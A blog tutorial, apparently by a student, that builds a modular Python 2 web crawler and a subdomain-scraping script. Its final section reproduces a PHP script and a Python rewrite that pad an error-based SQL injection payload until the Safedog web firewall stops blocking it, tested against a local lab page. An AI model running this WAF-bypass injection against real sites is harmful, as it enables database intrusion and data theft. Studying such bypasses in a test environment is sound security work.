This crawler comes from 蚂蚁老师's course on 慕课网 (imooc), which I thought was very well done, so I modified it a bit. It was originally written to crawl 1000 Python-related entries from Baidu Baike (that still works today; if the target pages change later you would have to design a new crawling strategy, but the overall framework stays the same). I changed it to crawl every link on a whole site, and it is still very easy to extend.
The basic components of a crawler (蚂蚁老师 has a diagram of this in the course):
1. Scheduler: coordinates the other parts, e.g. it takes a URL out of the manager, hands it to the downloader, passes the downloaded page to the parser, and collects the new URLs and the data the parser extracts
2. URL manager: maintains two set()s (why set()? because set() dedupes for free), one for URLs that have already been crawled and one for URLs waiting to be crawled; it also needs a method for adding the new URLs the parser finds into the to-crawl set, and so on
3. Downloader: the simplest part to implement; for a static page, r = requests.get and then r.content puts the page content into memory (storing it in a database works too). It is also the main place you extend things: some pages require a login, in which case you have to POST the username and password, or attach a cookie from a session that is already logged in (see the sketch right after this list)
4. Parser: parses the pages fetched by the downloader, with BeautifulSoup, regular expressions, or the pyquery that binghe 牛 likes
5. Outputer: its main job is to output the data you wanted
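Before getting into the modules, here is a rough sketch of the login case mentioned in point 3. Everything in it (the login URL, the form field names, the credentials, the cookie value) is a made-up placeholder; the point is only that requests.Session can either POST credentials or carry a cookie from a browser that is already logged in:

# -*- coding: UTF-8 -*-
import requests

session = requests.Session()
# Option 1: POST credentials to a (hypothetical) login form;
# the field names 'username'/'password' depend entirely on the target site.
session.post('http://example.com/login',
             data={'username': 'someone', 'password': 'secret'},
             timeout=3)
# Option 2: reuse a cookie captured from a browser session that is already logged in.
# session.headers['Cookie'] = 'PHPSESSID=...'
r = session.get('http://example.com/members_only.html', timeout=3)
if r.status_code == 200:
    html = r.content  # same kind of result the plain HtmlDownloader below returns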
Scheduler:
spider_main.py
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
from spider import url_manager, html_downloader, html_outputer, html_parser
class SpiderMain(object):
    def __init__(self):
        self.urls = url_manager.UrlManager()
        self.downloader = html_downloader.HtmlDownloader()
        self.parser = html_parser.HtmlParser()
        self.outputer = html_outputer.HtmlOutputer()

    def craw(self, root_url):
        self.urls.add_new_url(root_url)
        while self.urls.has_new_url():
            try:
                new_url = self.urls.get_new_url()
                print 'craw : %s' % new_url
                html_cont = self.downloader.download(new_url)
                new_urls, new_data = self.parser.parse(new_url, html_cont)
                self.urls.add_new_urls(new_urls)
                self.outputer.collect_data(new_data)
            except:
                print 'craw failed'
        self.outputer.output_html()
if __name__ == "__main__":
    root_url = "the site you want to crawl"  # I tried it on 爱编程 and the results were decent
    obj_spider = SpiderMain()
    obj_spider.craw(root_url)
Here __init__ does the initialization; url_manager, html_downloader, html_outputer and html_parser are modules I wrote myself, each with its own class and methods, and the initializer creates an instance of each class.
craw is where the scheduler drives the other modules:
new_url = self.urls.get_new_url()
print 'craw : %s' % new_url
html_cont = self.downloader.download(new_url)
new_urls, new_data = self.parser.parse(new_url, html_cont)
self.urls.add_new_urls(new_urls)
self.outputer.collect_data(new_data)
These lines correspond to:
1. Take one URL from the to-crawl list
2. Send that URL to the downloader, which returns the page content
3. Send the page to the parser, which extracts a list of new URLs plus the data we want
4. Have the URL manager add the new URLs to the to-crawl list
5. Have the outputer output the data
URL manager:
url_manager.py:
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
class UrlManager(object):
    def __init__(self):
        self.new_urls = set()
        self.old_urls = set()

    def add_new_url(self, url):
        if url is None:
            return
        if url not in self.new_urls and url not in self.old_urls:
            self.new_urls.add(url)

    def add_new_urls(self, urls):
        if urls is None or len(urls) == 0:
            return
        for url in urls:
            self.add_new_url(url)

    def has_new_url(self):
        return len(self.new_urls) != 0

    def get_new_url(self):
        new_url = self.new_urls.pop()
        self.old_urls.add(new_url)
        return new_url
These are the class and its methods in the url_manager module.
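A quick illustration (not part of the course code) of the dedup behaviour this class gets from set(): adding the same URL twice, or re-adding a URL that has already been crawled, changes nothing. The example.com URLs are just placeholders:

urls = UrlManager()
urls.add_new_url('http://example.com/a')
urls.add_new_url('http://example.com/a')   # already in new_urls, silently ignored
first = urls.get_new_url()                 # moves the URL into old_urls
urls.add_new_url(first)                    # already crawled, so it is not queued again
print urls.has_new_url()                   # False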
Downloader:
html_downloader.py
蚂蚁老师 originally used urllib; I swapped it out for requests:
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import requests

class HtmlDownloader(object):
    def download(self, url):
        if url is None:
            return None
        r = requests.get(url, timeout=3)
        if r.status_code != 200:
            return None
        return r.content
HTML parser:
html_parser.py
I changed the crawl strategy: the parser now extracts every link on the page, i.e. the href value of every a tag (a same-domain variant is sketched right after the class):
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import re
import urlparse
from bs4 import BeautifulSoup
class HtmlParser(object):
    def parse(self, page_url, html_cont):
        if page_url is None or html_cont is None:
            return
        soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')
        new_urls = self._get_new_urls(page_url, soup)
        new_data = self._get_new_data(page_url, soup)
        return new_urls, new_data

    def _get_new_urls(self, page_url, soup):
        new_urls = set()
        links = soup.find_all('a', href=True)  # only a tags that actually carry an href
        for link in links:
            new_url = link['href']
            new_full_url = urlparse.urljoin(page_url, new_url)  # resolve relative links against the current page
            new_urls.add(new_full_url)
        return new_urls

    def _get_new_data(self, page_url, soup):
        res_data = {}
        # record the page URL so the outputer's data['url'] column has something to print
        res_data['url'] = page_url
        return res_data
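One thing to note: _get_new_urls keeps every link it finds, so the crawl will wander off to other sites. If you want a whole-site crawl confined to one domain, a small variant (just a sketch, reusing the urlparse import that is already there) is to keep only links whose host matches the page being parsed:

    def _get_new_urls(self, page_url, soup):
        new_urls = set()
        page_host = urlparse.urlparse(page_url).netloc
        for link in soup.find_all('a', href=True):
            new_full_url = urlparse.urljoin(page_url, link['href'])
            # skip links that point at other hosts so the crawl stays on one site
            if urlparse.urlparse(new_full_url).netloc == page_host:
                new_urls.add(new_full_url)
        return new_urls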
Outputer:
html_outputer.py
This one is optional; the crawled URLs already get printed to the console either way:
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
class HtmlOutputer(object):
    def __init__(self):
        self.datas = []

    def collect_data(self, data):
        if data is None:
            return
        self.datas.append(data)

    def output_html(self):
        fout = open('output.html', 'w')
        fout.write("<html>")
        fout.write("<body>")
        fout.write("<table>")
        for data in self.datas:
            fout.write("<tr>")
            fout.write("<td>%s</td>" % data['url'])
            #fout.write("<td>%s</td>" % data['title'].encode('utf-8'))
            #fout.write("<td>%s</td>" % data['summary'].encode('utf-8'))
            fout.write("</tr>")
        fout.write("</table>")
        fout.write("</body>")
        fout.write("</html>")
        fout.close()
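The commented-out title/summary columns above are left over from the Baidu Baike version. If you want the title column back for the generic whole-site crawl, one possible version of _get_new_data in html_parser.py (just a sketch; a 'summary' depends entirely on the target site's markup, so it is omitted) could pull the page's <title> tag:

    def _get_new_data(self, page_url, soup):
        res_data = {'url': page_url}
        # fall back to an empty string so the outputer's title column never hits a KeyError
        res_data['title'] = soup.title.get_text() if soup.title is not None else ''
        return res_data

With that in place you can uncomment the data['title'] line in output_html.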
This crawler framework is quite extensible, and you can build on it to grab whatever content you are after.
Of course, if you only need a few things from a single page, none of this machinery is necessary; a small script will do.
For example, to pull the subdomain results out of a subdomain-lookup page:
#coding: utf-8
import urllib, re

def getall(url):
    page = urllib.urlopen(url).read()
    return page

def ressubd(all):
    # the result page lists each subdomain as value="..."><input, so grab what sits in between
    a = re.compile(r'value="(.*?\.com|.*?\.cn|.*?\.com\.cn|.*?\.org| )"><input')
    subdomains = re.findall(a, all)
    return subdomains

if __name__ == '__main__':
    # the decode/encode dance makes the Chinese text display correctly in a GBK Windows console
    print '作者:深夜'.decode('utf-8').encode('gbk')
    print '--------------'
    print 'blog: http://blog.163.com/sy_butian/blog'
    print '--------------'
    url = 'http://i.links.cn/subdomain/' + raw_input('请输入主域名:'.decode('utf-8').encode('gbk')) + '.html'
    all = getall(url)
    subd = ressubd(all)
    sub = ''.join(subd)
    s = sub.replace('http://', '\n')
    print s
    with open('url.txt', 'w') as f:
        f.writelines(s)
For a one-off like this, a regex is enough and quick to write.
A while back, 海盗表哥 wrote a PHP fuzz script for getting past Safedog (过狗):
http://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=16134
Here is 表哥's PHP version:
<?php
$i = 10000;
$url = 'http://192.168.1.121/sqlin.php';
for (;;) {
    $i++;
    echo "$i\n";
    $payload = 'id=-1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))) and 1=' . str_repeat('3', $i);
    $ret = doPost($url, $payload);
    if (!strpos($ret, '网站防火墙')) {
        echo "done!\n" . strlen($payload) . "\n" . $ret;
        die();
    }
}

function doPost($url, $data = '') {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    $return = curl_exec($ch);
    curl_close($ch);
    return $return;
}
I set up a local test environment and rewrote it in Python, which turned out to be easy enough. The idea is to keep padding the payload with more characters until the '网站防火墙' block page stops coming back, i.e. until the request is long enough that the WAF no longer flags it:
#coding: utf-8
import requests

url = 'http://localhost:8090/sqlin.php'

def dopost(url, data=''):
    r = requests.post(url, data)
    return r.content

for i in range(9990, 10000):
    payload = {'id': '1 and 1=' + i * '3' + ' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))'}
    #print payload
    ret = dopost(url, payload)
    if ret.find('网站防火墙') == -1:
        print "done\n" + "\n" + ret
        exit(0)
Life as a student is rough; my exams don't finish until 1.15. That's it for now; this post took me two hours to write and I need to get back to revising. If any of you 表哥 have comments or suggestions, fire away; I'll fix anything that's wrong.